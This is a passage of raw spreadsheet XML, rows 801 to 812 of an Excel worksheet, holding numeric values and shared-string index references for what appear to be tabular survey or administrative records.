      <c r="T801">
        <v>1</v>
      </c>
      <c r="U801">
        <v>42500</v>
      </c>
      <c r="V801">
        <v>186000</v>
      </c>
      <c r="W801">
        <v>0</v>
      </c>
      <c r="X801">
        <v>0</v>
      </c>
      <c r="Y801">
        <v>0</v>
      </c>
      <c r="Z801">
        <v>0</v>
      </c>
      <c r="AA801">
        <v>0</v>
      </c>
      <c r="AB801">
        <v>0</v>
      </c>
      <c r="AC801">
        <v>0</v>
      </c>
      <c r="AD801">
        <v>0</v>
      </c>
      <c r="AE801">
        <v>2760000</v>
      </c>
      <c r="AF801" t="s">
        <v>6240</v>
      </c>
      <c r="AG801">
        <v>17530</v>
      </c>
      <c r="AH801">
        <v>13</v>
      </c>
      <c r="AJ801">
        <v>176</v>
      </c>
      <c r="AK801" t="s">
        <v>1180</v>
      </c>
      <c r="AL801" t="s">
        <v>6241</v>
      </c>
      <c r="AM801" t="s">
        <v>6242</v>
      </c>
      <c r="AN801" t="s">
        <v>82</v>
      </c>
      <c r="AO801">
        <v>2012</v>
      </c>
      <c r="AP801" t="s">
        <v>6243</v>
      </c>
      <c r="AQ801" t="s">
        <v>6244</v>
      </c>
      <c r="AR801" t="s">
        <v>6245</v>
      </c>
      <c r="AU801">
        <v>5</v>
      </c>
      <c r="AV801">
        <v>1</v>
      </c>
      <c r="AW801">
        <v>5</v>
      </c>
      <c r="AX801">
        <v>0</v>
      </c>
      <c r="AY801">
        <v>85</v>
      </c>
      <c r="AZ801">
        <v>55</v>
      </c>
      <c r="BA801" t="s">
        <v>17472</v>
      </c>
      <c r="BB801">
        <v>0</v>
      </c>
      <c r="BC801">
        <v>0</v>
      </c>
      <c r="BD801">
        <v>0</v>
      </c>
    </row>
    <row r="802" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A802">
        <v>2083</v>
      </c>
      <c r="B802" t="s">
        <v>6246</v>
      </c>
      <c r="C802" t="s">
        <v>458</v>
      </c>
      <c r="D802" t="s">
        <v>6247</v>
      </c>
      <c r="E802" t="s">
        <v>300</v>
      </c>
      <c r="F802" t="s">
        <v>6248</v>
      </c>
      <c r="G802" s="1">
        <v>44074</v>
      </c>
      <c r="H802">
        <v>5931</v>
      </c>
      <c r="I802">
        <v>5931</v>
      </c>
      <c r="J802">
        <v>1</v>
      </c>
      <c r="K802">
        <v>0</v>
      </c>
      <c r="L802">
        <v>1</v>
      </c>
      <c r="M802">
        <v>1</v>
      </c>
      <c r="N802">
        <v>0</v>
      </c>
      <c r="O802">
        <v>0</v>
      </c>
      <c r="P802">
        <v>0</v>
      </c>
      <c r="Q802">
        <v>0</v>
      </c>
      <c r="R802">
        <v>0</v>
      </c>
      <c r="S802">
        <v>0</v>
      </c>
      <c r="T802">
        <v>0</v>
      </c>
      <c r="U802">
        <v>70000</v>
      </c>
      <c r="V802">
        <v>0</v>
      </c>
      <c r="W802">
        <v>3000</v>
      </c>
      <c r="X802">
        <v>1500</v>
      </c>
      <c r="Y802">
        <v>0</v>
      </c>
      <c r="Z802">
        <v>0</v>
      </c>
      <c r="AA802">
        <v>0</v>
      </c>
      <c r="AB802">
        <v>0</v>
      </c>
      <c r="AC802">
        <v>0</v>
      </c>
      <c r="AD802">
        <v>0</v>
      </c>
      <c r="AE802">
        <v>0</v>
      </c>
      <c r="AF802" t="s">
        <v>6249</v>
      </c>
      <c r="AG802">
        <v>29777</v>
      </c>
      <c r="AH802">
        <v>5</v>
      </c>
      <c r="AJ802">
        <v>150</v>
      </c>
      <c r="AK802" t="s">
        <v>6250</v>
      </c>
      <c r="AL802" t="s">
        <v>6251</v>
      </c>
      <c r="AM802" t="s">
        <v>6252</v>
      </c>
      <c r="AN802" t="s">
        <v>55</v>
      </c>
      <c r="AO802">
        <v>2018</v>
      </c>
      <c r="AP802">
        <v>81277034040</v>
      </c>
      <c r="AQ802" t="s">
        <v>6253</v>
      </c>
      <c r="AR802" t="s">
        <v>6249</v>
      </c>
      <c r="AS802" t="s">
        <v>71</v>
      </c>
      <c r="AT802" t="s">
        <v>58</v>
      </c>
      <c r="AU802">
        <v>25</v>
      </c>
      <c r="AV802">
        <v>1</v>
      </c>
      <c r="AW802">
        <v>0</v>
      </c>
      <c r="AX802">
        <v>0</v>
      </c>
      <c r="AY802">
        <v>7</v>
      </c>
      <c r="AZ802">
        <v>7</v>
      </c>
      <c r="BA802" t="s">
        <v>17060</v>
      </c>
      <c r="BB802" t="s">
        <v>15688</v>
      </c>
      <c r="BC802">
        <v>0</v>
      </c>
      <c r="BD802">
        <v>0</v>
      </c>
    </row>
    <row r="803" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A803">
        <v>2213</v>
      </c>
      <c r="B803" t="s">
        <v>6254</v>
      </c>
      <c r="C803" t="s">
        <v>157</v>
      </c>
      <c r="D803" t="s">
        <v>6255</v>
      </c>
      <c r="E803" t="s">
        <v>142</v>
      </c>
      <c r="F803" t="s">
        <v>5048</v>
      </c>
      <c r="G803" s="1">
        <v>44146</v>
      </c>
      <c r="H803">
        <v>6018</v>
      </c>
      <c r="I803">
        <v>6018</v>
      </c>
      <c r="J803">
        <v>2</v>
      </c>
      <c r="K803">
        <v>0</v>
      </c>
      <c r="L803">
        <v>0</v>
      </c>
      <c r="M803">
        <v>0</v>
      </c>
      <c r="N803">
        <v>10000</v>
      </c>
      <c r="O803">
        <v>0</v>
      </c>
      <c r="P803">
        <v>0</v>
      </c>
      <c r="Q803">
        <v>3</v>
      </c>
      <c r="R803">
        <v>0</v>
      </c>
      <c r="S803">
        <v>0</v>
      </c>
      <c r="T803">
        <v>0</v>
      </c>
      <c r="U803">
        <v>0</v>
      </c>
      <c r="V803">
        <v>0</v>
      </c>
      <c r="W803">
        <v>0</v>
      </c>
      <c r="X803">
        <v>0</v>
      </c>
      <c r="Y803">
        <v>0</v>
      </c>
      <c r="Z803">
        <v>0</v>
      </c>
      <c r="AA803">
        <v>0</v>
      </c>
      <c r="AB803">
        <v>0</v>
      </c>
      <c r="AC803">
        <v>0</v>
      </c>
      <c r="AD803">
        <v>0</v>
      </c>
      <c r="AE803">
        <v>0</v>
      </c>
      <c r="AF803" t="s">
        <v>3680</v>
      </c>
      <c r="AG803">
        <v>68362</v>
      </c>
      <c r="AH803">
        <v>16</v>
      </c>
      <c r="AJ803">
        <v>239</v>
      </c>
      <c r="AK803" t="s">
        <v>564</v>
      </c>
      <c r="AL803" t="s">
        <v>565</v>
      </c>
      <c r="AM803" t="s">
        <v>6256</v>
      </c>
      <c r="AN803" t="s">
        <v>82</v>
      </c>
      <c r="AO803">
        <v>2019</v>
      </c>
      <c r="AP803">
        <v>315459213</v>
      </c>
      <c r="AQ803" t="s">
        <v>3670</v>
      </c>
      <c r="AR803" t="s">
        <v>569</v>
      </c>
      <c r="AS803" t="s">
        <v>71</v>
      </c>
      <c r="AT803" t="s">
        <v>86</v>
      </c>
      <c r="AU803">
        <v>25</v>
      </c>
      <c r="AV803">
        <v>1</v>
      </c>
      <c r="AW803">
        <v>0</v>
      </c>
      <c r="AX803">
        <v>0</v>
      </c>
      <c r="AY803">
        <v>11</v>
      </c>
      <c r="AZ803">
        <v>424</v>
      </c>
      <c r="BA803" t="s">
        <v>16648</v>
      </c>
      <c r="BB803" t="s">
        <v>15094</v>
      </c>
      <c r="BC803">
        <v>0</v>
      </c>
      <c r="BD803" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="804" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A804">
        <v>2704</v>
      </c>
      <c r="B804" t="s">
        <v>5703</v>
      </c>
      <c r="C804" t="s">
        <v>74</v>
      </c>
      <c r="D804" t="s">
        <v>6257</v>
      </c>
      <c r="E804" t="s">
        <v>300</v>
      </c>
      <c r="F804" t="s">
        <v>6258</v>
      </c>
      <c r="G804" s="1">
        <v>44137</v>
      </c>
      <c r="H804">
        <v>6048</v>
      </c>
      <c r="I804">
        <v>6048</v>
      </c>
      <c r="J804">
        <v>6</v>
      </c>
      <c r="K804">
        <v>0</v>
      </c>
      <c r="L804">
        <v>1</v>
      </c>
      <c r="M804">
        <v>1</v>
      </c>
      <c r="N804">
        <v>0</v>
      </c>
      <c r="O804">
        <v>0</v>
      </c>
      <c r="P804">
        <v>0</v>
      </c>
      <c r="Q804">
        <v>0</v>
      </c>
      <c r="R804">
        <v>0</v>
      </c>
      <c r="S804">
        <v>0</v>
      </c>
      <c r="T804">
        <v>1</v>
      </c>
      <c r="U804">
        <v>360000</v>
      </c>
      <c r="V804">
        <v>0</v>
      </c>
      <c r="W804">
        <v>3000</v>
      </c>
      <c r="X804">
        <v>1000</v>
      </c>
      <c r="Y804">
        <v>0</v>
      </c>
      <c r="Z804">
        <v>0</v>
      </c>
      <c r="AA804">
        <v>0</v>
      </c>
      <c r="AB804">
        <v>0</v>
      </c>
      <c r="AC804">
        <v>0</v>
      </c>
      <c r="AD804">
        <v>0</v>
      </c>
      <c r="AE804">
        <v>0</v>
      </c>
      <c r="AF804" t="s">
        <v>5706</v>
      </c>
      <c r="AG804">
        <v>50181</v>
      </c>
      <c r="AH804">
        <v>14</v>
      </c>
      <c r="AJ804">
        <v>220</v>
      </c>
      <c r="AK804" t="s">
        <v>812</v>
      </c>
      <c r="AL804" t="s">
        <v>813</v>
      </c>
      <c r="AM804" t="s">
        <v>6259</v>
      </c>
      <c r="AN804" t="s">
        <v>55</v>
      </c>
      <c r="AO804">
        <v>2009</v>
      </c>
      <c r="AP804" t="s">
        <v>5708</v>
      </c>
      <c r="AQ804" t="s">
        <v>5709</v>
      </c>
      <c r="AR804" t="s">
        <v>5706</v>
      </c>
      <c r="AS804" t="s">
        <v>71</v>
      </c>
      <c r="AT804" t="s">
        <v>58</v>
      </c>
      <c r="AU804">
        <v>25</v>
      </c>
      <c r="AV804">
        <v>1</v>
      </c>
      <c r="AW804">
        <v>13</v>
      </c>
      <c r="AX804">
        <v>67</v>
      </c>
      <c r="AY804">
        <v>9</v>
      </c>
      <c r="AZ804">
        <v>7</v>
      </c>
      <c r="BA804" t="s">
        <v>16636</v>
      </c>
      <c r="BB804" t="s">
        <v>15902</v>
      </c>
      <c r="BC804">
        <v>0</v>
      </c>
      <c r="BD804" t="s">
        <v>11929</v>
      </c>
    </row>
    <row r="805" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A805">
        <v>2273</v>
      </c>
      <c r="B805" t="s">
        <v>6260</v>
      </c>
      <c r="C805" t="s">
        <v>157</v>
      </c>
      <c r="D805" t="s">
        <v>6261</v>
      </c>
      <c r="E805" t="s">
        <v>363</v>
      </c>
      <c r="F805" t="s">
        <v>6262</v>
      </c>
      <c r="G805" s="1">
        <v>43907</v>
      </c>
      <c r="H805">
        <v>6116</v>
      </c>
      <c r="I805">
        <v>6116</v>
      </c>
      <c r="J805">
        <v>1</v>
      </c>
      <c r="K805">
        <v>0</v>
      </c>
      <c r="L805">
        <v>0</v>
      </c>
      <c r="M805">
        <v>0</v>
      </c>
      <c r="N805">
        <v>0</v>
      </c>
      <c r="O805">
        <v>0</v>
      </c>
      <c r="P805">
        <v>0</v>
      </c>
      <c r="Q805">
        <v>2</v>
      </c>
      <c r="R805">
        <v>0</v>
      </c>
      <c r="S805">
        <v>1</v>
      </c>
      <c r="T805">
        <v>0</v>
      </c>
      <c r="U805">
        <v>15</v>
      </c>
      <c r="V805">
        <v>0</v>
      </c>
      <c r="W805">
        <v>0</v>
      </c>
      <c r="X805">
        <v>0</v>
      </c>
      <c r="Y805">
        <v>0</v>
      </c>
      <c r="Z805">
        <v>0</v>
      </c>
      <c r="AA805">
        <v>0</v>
      </c>
      <c r="AB805">
        <v>10</v>
      </c>
      <c r="AC805">
        <v>0</v>
      </c>
      <c r="AD805">
        <v>1</v>
      </c>
      <c r="AE805">
        <v>0</v>
      </c>
      <c r="AF805" t="s">
        <v>6263</v>
      </c>
      <c r="AG805">
        <v>61234</v>
      </c>
      <c r="AH805">
        <v>16</v>
      </c>
      <c r="AJ805">
        <v>242</v>
      </c>
      <c r="AK805" t="s">
        <v>1894</v>
      </c>
      <c r="AL805" t="s">
        <v>6264</v>
      </c>
      <c r="AM805" t="s">
        <v>6265</v>
      </c>
      <c r="AN805" t="s">
        <v>55</v>
      </c>
      <c r="AO805">
        <v>2019</v>
      </c>
      <c r="AP805">
        <v>82131123030</v>
      </c>
      <c r="AQ805" t="s">
        <v>6266</v>
      </c>
      <c r="AR805" t="s">
        <v>6267</v>
      </c>
      <c r="AU805">
        <v>6</v>
      </c>
      <c r="AV805">
        <v>1</v>
      </c>
      <c r="AW805">
        <v>11</v>
      </c>
      <c r="AX805">
        <v>0</v>
      </c>
      <c r="AY805">
        <v>8</v>
      </c>
      <c r="AZ805">
        <v>3</v>
      </c>
      <c r="BA805" t="s">
        <v>17108</v>
      </c>
      <c r="BB805" t="s">
        <v>15799</v>
      </c>
      <c r="BC805">
        <v>0</v>
      </c>
      <c r="BD805">
        <v>0</v>
      </c>
    </row>
    <row r="806" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A806">
        <v>1865</v>
      </c>
      <c r="B806" t="s">
        <v>6268</v>
      </c>
      <c r="C806" t="s">
        <v>5506</v>
      </c>
      <c r="D806" t="s">
        <v>6269</v>
      </c>
      <c r="E806" t="s">
        <v>111</v>
      </c>
      <c r="F806" t="s">
        <v>6270</v>
      </c>
      <c r="G806" s="1">
        <v>44200</v>
      </c>
      <c r="H806">
        <v>6233</v>
      </c>
      <c r="I806">
        <v>6233</v>
      </c>
      <c r="J806">
        <v>4</v>
      </c>
      <c r="K806">
        <v>2</v>
      </c>
      <c r="L806">
        <v>4</v>
      </c>
      <c r="M806">
        <v>0</v>
      </c>
      <c r="N806">
        <v>0</v>
      </c>
      <c r="O806">
        <v>0</v>
      </c>
      <c r="P806">
        <v>0</v>
      </c>
      <c r="Q806">
        <v>1</v>
      </c>
      <c r="R806">
        <v>2</v>
      </c>
      <c r="S806">
        <v>1</v>
      </c>
      <c r="T806">
        <v>0</v>
      </c>
      <c r="U806">
        <v>14000</v>
      </c>
      <c r="V806">
        <v>20000</v>
      </c>
      <c r="W806">
        <v>4000</v>
      </c>
      <c r="X806">
        <v>0</v>
      </c>
      <c r="Y806">
        <v>0</v>
      </c>
      <c r="Z806">
        <v>0</v>
      </c>
      <c r="AA806">
        <v>0</v>
      </c>
      <c r="AB806">
        <v>100</v>
      </c>
      <c r="AC806">
        <v>1000</v>
      </c>
      <c r="AD806">
        <v>1</v>
      </c>
      <c r="AE806">
        <v>0</v>
      </c>
      <c r="AF806" t="s">
        <v>6271</v>
      </c>
      <c r="AG806">
        <v>85226</v>
      </c>
      <c r="AH806">
        <v>19</v>
      </c>
      <c r="AJ806">
        <v>314</v>
      </c>
      <c r="AK806" t="s">
        <v>6127</v>
      </c>
      <c r="AL806" t="s">
        <v>6128</v>
      </c>
      <c r="AM806" t="s">
        <v>6272</v>
      </c>
      <c r="AN806" t="s">
        <v>68</v>
      </c>
      <c r="AO806">
        <v>2019</v>
      </c>
      <c r="AP806">
        <v>81236571310</v>
      </c>
      <c r="AQ806" t="s">
        <v>6273</v>
      </c>
      <c r="AR806" t="s">
        <v>6271</v>
      </c>
      <c r="AS806" t="s">
        <v>71</v>
      </c>
      <c r="AT806" t="s">
        <v>72</v>
      </c>
      <c r="AU806">
        <v>58</v>
      </c>
      <c r="AV806">
        <v>2</v>
      </c>
      <c r="AW806">
        <v>16</v>
      </c>
      <c r="AX806">
        <v>0</v>
      </c>
      <c r="AY806">
        <v>13</v>
      </c>
      <c r="AZ806">
        <v>4</v>
      </c>
      <c r="BA806" t="s">
        <v>17017</v>
      </c>
      <c r="BB806" t="s">
        <v>15561</v>
      </c>
      <c r="BC806" t="s">
        <v>12008</v>
      </c>
      <c r="BD806" t="s">
        <v>12009</v>
      </c>
    </row>
    <row r="807" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A807">
        <v>1821</v>
      </c>
      <c r="B807" t="s">
        <v>6274</v>
      </c>
      <c r="C807" t="s">
        <v>74</v>
      </c>
      <c r="D807" t="s">
        <v>6275</v>
      </c>
      <c r="E807" t="s">
        <v>843</v>
      </c>
      <c r="F807" t="s">
        <v>6276</v>
      </c>
      <c r="G807" s="1">
        <v>44337</v>
      </c>
      <c r="H807">
        <v>6259</v>
      </c>
      <c r="I807">
        <v>6259</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t="s">
        <v>6277</v>
      </c>
      <c r="AG807">
        <v>0</v>
      </c>
      <c r="AH807">
        <v>14</v>
      </c>
      <c r="AJ807">
        <v>220</v>
      </c>
      <c r="AK807" t="s">
        <v>3842</v>
      </c>
      <c r="AL807" t="s">
        <v>3842</v>
      </c>
      <c r="AM807" t="s">
        <v>6278</v>
      </c>
      <c r="AN807" t="s">
        <v>55</v>
      </c>
      <c r="AO807">
        <v>2019</v>
      </c>
      <c r="AP807" t="s">
        <v>6279</v>
      </c>
      <c r="AQ807">
        <v>81225218998</v>
      </c>
      <c r="AR807" t="s">
        <v>6277</v>
      </c>
      <c r="AS807" t="s">
        <v>71</v>
      </c>
      <c r="AT807" t="s">
        <v>58</v>
      </c>
      <c r="AU807">
        <v>7</v>
      </c>
      <c r="AV807">
        <v>1</v>
      </c>
      <c r="AW807">
        <v>5</v>
      </c>
      <c r="AX807">
        <v>0</v>
      </c>
      <c r="AY807">
        <v>4</v>
      </c>
      <c r="AZ807">
        <v>1</v>
      </c>
      <c r="BA807" t="s">
        <v>17005</v>
      </c>
      <c r="BB807" t="s">
        <v>15536</v>
      </c>
      <c r="BC807">
        <v>0</v>
      </c>
      <c r="BD807" t="s">
        <v>9551</v>
      </c>
    </row>
    <row r="808" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A808">
        <v>2035</v>
      </c>
      <c r="B808" t="s">
        <v>6280</v>
      </c>
      <c r="C808" t="s">
        <v>477</v>
      </c>
      <c r="D808" t="s">
        <v>6281</v>
      </c>
      <c r="E808" t="s">
        <v>6282</v>
      </c>
      <c r="F808" t="s">
        <v>6283</v>
      </c>
      <c r="G808" s="1">
        <v>44159</v>
      </c>
      <c r="H808">
        <v>6306</v>
      </c>
      <c r="I808">
        <v>6306</v>
      </c>
      <c r="J808">
        <v>2</v>
      </c>
      <c r="K808">
        <v>1</v>
      </c>
      <c r="L808">
        <v>3</v>
      </c>
      <c r="M808">
        <v>0</v>
      </c>
      <c r="N808">
        <v>0</v>
      </c>
      <c r="O808">
        <v>0</v>
      </c>
      <c r="P808">
        <v>0</v>
      </c>
      <c r="Q808">
        <v>0</v>
      </c>
      <c r="R808">
        <v>10</v>
      </c>
      <c r="S808">
        <v>0</v>
      </c>
      <c r="T808">
        <v>1</v>
      </c>
      <c r="U808">
        <v>1000000</v>
      </c>
      <c r="V808">
        <v>1000</v>
      </c>
      <c r="W808">
        <v>15000</v>
      </c>
      <c r="X808">
        <v>0</v>
      </c>
      <c r="Y808">
        <v>0</v>
      </c>
      <c r="Z808">
        <v>0</v>
      </c>
      <c r="AA808">
        <v>0</v>
      </c>
      <c r="AB808">
        <v>0</v>
      </c>
      <c r="AC808">
        <v>5000</v>
      </c>
      <c r="AD808">
        <v>0</v>
      </c>
      <c r="AE808">
        <v>5000</v>
      </c>
      <c r="AF808" t="s">
        <v>6284</v>
      </c>
      <c r="AG808">
        <v>95372</v>
      </c>
      <c r="AH808">
        <v>29</v>
      </c>
      <c r="AJ808">
        <v>376</v>
      </c>
      <c r="AK808" t="s">
        <v>5334</v>
      </c>
      <c r="AL808" t="s">
        <v>5334</v>
      </c>
      <c r="AM808" t="s">
        <v>6285</v>
      </c>
      <c r="AN808" t="s">
        <v>55</v>
      </c>
      <c r="AO808">
        <v>2016</v>
      </c>
      <c r="AP808" t="s">
        <v>623</v>
      </c>
      <c r="AQ808" t="s">
        <v>6286</v>
      </c>
      <c r="AR808" t="s">
        <v>6284</v>
      </c>
      <c r="AS808" t="s">
        <v>71</v>
      </c>
      <c r="AT808" t="s">
        <v>72</v>
      </c>
      <c r="AU808">
        <v>25</v>
      </c>
      <c r="AV808">
        <v>1</v>
      </c>
      <c r="AW808">
        <v>5</v>
      </c>
      <c r="AX808">
        <v>10</v>
      </c>
      <c r="AY808">
        <v>3</v>
      </c>
      <c r="AZ808">
        <v>5</v>
      </c>
      <c r="BA808" t="s">
        <v>17046</v>
      </c>
      <c r="BB808" t="s">
        <v>15658</v>
      </c>
      <c r="BC808" t="s">
        <v>9965</v>
      </c>
      <c r="BD808" t="s">
        <v>11937</v>
      </c>
    </row>
    <row r="809" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A809">
        <v>1990</v>
      </c>
      <c r="B809" t="s">
        <v>6287</v>
      </c>
      <c r="C809" t="s">
        <v>168</v>
      </c>
      <c r="D809" t="s">
        <v>6288</v>
      </c>
      <c r="E809" t="s">
        <v>412</v>
      </c>
      <c r="F809" t="s">
        <v>6289</v>
      </c>
      <c r="G809" s="1">
        <v>44378</v>
      </c>
      <c r="H809">
        <v>6324</v>
      </c>
      <c r="I809">
        <v>6324</v>
      </c>
      <c r="J809">
        <v>1</v>
      </c>
      <c r="K809">
        <v>0</v>
      </c>
      <c r="L809">
        <v>1</v>
      </c>
      <c r="M809">
        <v>0</v>
      </c>
      <c r="N809">
        <v>0</v>
      </c>
      <c r="O809">
        <v>0</v>
      </c>
      <c r="P809">
        <v>0</v>
      </c>
      <c r="Q809">
        <v>0</v>
      </c>
      <c r="R809">
        <v>0</v>
      </c>
      <c r="S809">
        <v>0</v>
      </c>
      <c r="T809">
        <v>1</v>
      </c>
      <c r="U809">
        <v>500000</v>
      </c>
      <c r="V809">
        <v>0</v>
      </c>
      <c r="W809">
        <v>50000</v>
      </c>
      <c r="X809">
        <v>0</v>
      </c>
      <c r="Y809">
        <v>0</v>
      </c>
      <c r="Z809">
        <v>0</v>
      </c>
      <c r="AA809">
        <v>0</v>
      </c>
      <c r="AB809">
        <v>0</v>
      </c>
      <c r="AC809">
        <v>0</v>
      </c>
      <c r="AD809">
        <v>0</v>
      </c>
      <c r="AE809">
        <v>1</v>
      </c>
      <c r="AF809" t="s">
        <v>6290</v>
      </c>
      <c r="AG809">
        <v>16452</v>
      </c>
      <c r="AH809">
        <v>13</v>
      </c>
      <c r="AJ809">
        <v>184</v>
      </c>
      <c r="AK809" t="s">
        <v>6291</v>
      </c>
      <c r="AL809" t="s">
        <v>6292</v>
      </c>
      <c r="AM809" t="s">
        <v>6293</v>
      </c>
      <c r="AN809" t="s">
        <v>55</v>
      </c>
      <c r="AO809">
        <v>2017</v>
      </c>
      <c r="AP809" t="s">
        <v>6294</v>
      </c>
      <c r="AQ809" t="s">
        <v>6295</v>
      </c>
      <c r="AR809" t="s">
        <v>6296</v>
      </c>
      <c r="AS809" t="s">
        <v>71</v>
      </c>
      <c r="AT809" t="s">
        <v>58</v>
      </c>
      <c r="AU809">
        <v>24</v>
      </c>
      <c r="AV809">
        <v>0</v>
      </c>
      <c r="AW809">
        <v>0</v>
      </c>
      <c r="AX809">
        <v>0</v>
      </c>
      <c r="AY809">
        <v>22</v>
      </c>
      <c r="AZ809">
        <v>9</v>
      </c>
      <c r="BA809" t="s">
        <v>17040</v>
      </c>
      <c r="BB809" t="s">
        <v>15629</v>
      </c>
      <c r="BC809" t="s">
        <v>9550</v>
      </c>
      <c r="BD809" t="s">
        <v>10065</v>
      </c>
    </row>
    <row r="810" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A810">
        <v>2597</v>
      </c>
      <c r="B810" t="s">
        <v>6297</v>
      </c>
      <c r="C810" t="s">
        <v>157</v>
      </c>
      <c r="D810" t="s">
        <v>6298</v>
      </c>
      <c r="E810" t="s">
        <v>142</v>
      </c>
      <c r="F810" t="s">
        <v>6299</v>
      </c>
      <c r="G810" s="1">
        <v>44294</v>
      </c>
      <c r="H810">
        <v>6542</v>
      </c>
      <c r="I810">
        <v>6542</v>
      </c>
      <c r="J810">
        <v>2</v>
      </c>
      <c r="K810">
        <v>2</v>
      </c>
      <c r="L810">
        <v>2</v>
      </c>
      <c r="M810">
        <v>2</v>
      </c>
      <c r="N810">
        <v>100</v>
      </c>
      <c r="O810">
        <v>0</v>
      </c>
      <c r="P810">
        <v>0</v>
      </c>
      <c r="Q810">
        <v>1</v>
      </c>
      <c r="R810">
        <v>3</v>
      </c>
      <c r="S810">
        <v>0</v>
      </c>
      <c r="T810">
        <v>1</v>
      </c>
      <c r="U810">
        <v>100</v>
      </c>
      <c r="V810">
        <v>400</v>
      </c>
      <c r="W810">
        <v>100</v>
      </c>
      <c r="X810">
        <v>100</v>
      </c>
      <c r="Y810">
        <v>0</v>
      </c>
      <c r="Z810">
        <v>0</v>
      </c>
      <c r="AA810">
        <v>0</v>
      </c>
      <c r="AB810">
        <v>50</v>
      </c>
      <c r="AC810">
        <v>5000</v>
      </c>
      <c r="AD810">
        <v>0</v>
      </c>
      <c r="AE810">
        <v>5000</v>
      </c>
      <c r="AF810" t="s">
        <v>6300</v>
      </c>
      <c r="AG810">
        <v>68472</v>
      </c>
      <c r="AH810">
        <v>16</v>
      </c>
      <c r="AJ810">
        <v>237</v>
      </c>
      <c r="AK810" t="s">
        <v>377</v>
      </c>
      <c r="AL810" t="s">
        <v>378</v>
      </c>
      <c r="AM810" t="s">
        <v>6301</v>
      </c>
      <c r="AN810" t="s">
        <v>55</v>
      </c>
      <c r="AO810">
        <v>2010</v>
      </c>
      <c r="AP810" t="s">
        <v>6302</v>
      </c>
      <c r="AQ810" t="s">
        <v>6303</v>
      </c>
      <c r="AR810" t="s">
        <v>6300</v>
      </c>
      <c r="AS810" t="s">
        <v>71</v>
      </c>
      <c r="AT810" t="s">
        <v>58</v>
      </c>
      <c r="AU810">
        <v>26</v>
      </c>
      <c r="AV810">
        <v>1</v>
      </c>
      <c r="AW810">
        <v>20</v>
      </c>
      <c r="AX810">
        <v>3</v>
      </c>
      <c r="AY810">
        <v>23</v>
      </c>
      <c r="AZ810">
        <v>10</v>
      </c>
      <c r="BA810" t="s">
        <v>16884</v>
      </c>
      <c r="BB810" t="s">
        <v>15887</v>
      </c>
      <c r="BC810" t="s">
        <v>9550</v>
      </c>
      <c r="BD810" t="s">
        <v>10779</v>
      </c>
    </row>
    <row r="811" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A811">
        <v>1854</v>
      </c>
      <c r="B811" t="s">
        <v>6304</v>
      </c>
      <c r="C811" t="s">
        <v>2308</v>
      </c>
      <c r="D811" t="s">
        <v>6305</v>
      </c>
      <c r="E811" t="s">
        <v>142</v>
      </c>
      <c r="F811" t="s">
        <v>6306</v>
      </c>
      <c r="G811" s="1">
        <v>44119</v>
      </c>
      <c r="H811">
        <v>6593</v>
      </c>
      <c r="I811">
        <v>6593</v>
      </c>
      <c r="J811">
        <v>2</v>
      </c>
      <c r="K811">
        <v>1</v>
      </c>
      <c r="L811">
        <v>2</v>
      </c>
      <c r="M811">
        <v>2</v>
      </c>
      <c r="N811">
        <v>0</v>
      </c>
      <c r="O811">
        <v>0</v>
      </c>
      <c r="P811">
        <v>0</v>
      </c>
      <c r="Q811">
        <v>5</v>
      </c>
      <c r="R811">
        <v>5</v>
      </c>
      <c r="S811">
        <v>0</v>
      </c>
      <c r="T811">
        <v>1</v>
      </c>
      <c r="U811">
        <v>200000</v>
      </c>
      <c r="V811">
        <v>10000</v>
      </c>
      <c r="W811">
        <v>15000</v>
      </c>
      <c r="X811">
        <v>1000</v>
      </c>
      <c r="Y811">
        <v>0</v>
      </c>
      <c r="Z811">
        <v>0</v>
      </c>
      <c r="AA811">
        <v>0</v>
      </c>
      <c r="AB811">
        <v>5000</v>
      </c>
      <c r="AC811">
        <v>5000</v>
      </c>
      <c r="AD811">
        <v>0</v>
      </c>
      <c r="AE811">
        <v>10000</v>
      </c>
      <c r="AF811" t="s">
        <v>6307</v>
      </c>
      <c r="AG811">
        <v>98415</v>
      </c>
      <c r="AH811">
        <v>33</v>
      </c>
      <c r="AJ811">
        <v>485</v>
      </c>
      <c r="AK811" t="s">
        <v>2313</v>
      </c>
      <c r="AL811" t="s">
        <v>2314</v>
      </c>
      <c r="AM811" t="s">
        <v>6308</v>
      </c>
      <c r="AN811" t="s">
        <v>55</v>
      </c>
      <c r="AO811">
        <v>2012</v>
      </c>
      <c r="AP811">
        <v>8121211986</v>
      </c>
      <c r="AQ811">
        <v>8121211986</v>
      </c>
      <c r="AR811" t="s">
        <v>6307</v>
      </c>
      <c r="AS811" t="s">
        <v>71</v>
      </c>
      <c r="AT811" t="s">
        <v>58</v>
      </c>
      <c r="AU811">
        <v>20</v>
      </c>
      <c r="AV811">
        <v>1</v>
      </c>
      <c r="AW811">
        <v>3</v>
      </c>
      <c r="AX811">
        <v>3</v>
      </c>
      <c r="AY811">
        <v>6</v>
      </c>
      <c r="AZ811">
        <v>5</v>
      </c>
      <c r="BA811" t="s">
        <v>17014</v>
      </c>
      <c r="BB811" t="s">
        <v>15554</v>
      </c>
      <c r="BC811" t="s">
        <v>9693</v>
      </c>
      <c r="BD811" t="s">
        <v>12164</v>
      </c>
    </row>
    <row r="812" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A812">
        <v>2267</v>
      </c>
      <c r="B812" t="s">
        <v>6309</v>
      </c>
      <c r="C812" t="s">
        <v>2760</v>
      </c>
      <c r="D812" t="s">
        <v>6310</v>
      </c>
      <c r="E812" t="s">
        <v>300</v>
      </c>
      <c r="F812" t="s">
        <v>6311</v>
      </c>
      <c r="G812" s="1">
        <v>43901</v>
      </c>
      <c r="H812">
        <v>6611</v>
      </c>
      <c r="I812">
        <v>6611</v>
      </c>
      <c r="J812">
        <v>1</v>
      </c>
      <c r="K812">
        <v>3</v>
      </c>
      <c r="L812">
        <v>1</v>
      </c>
      <c r="M812">
        <v>0</v>
      </c>
      <c r="N812">
        <v>0</v>
      </c>
      <c r="O812">
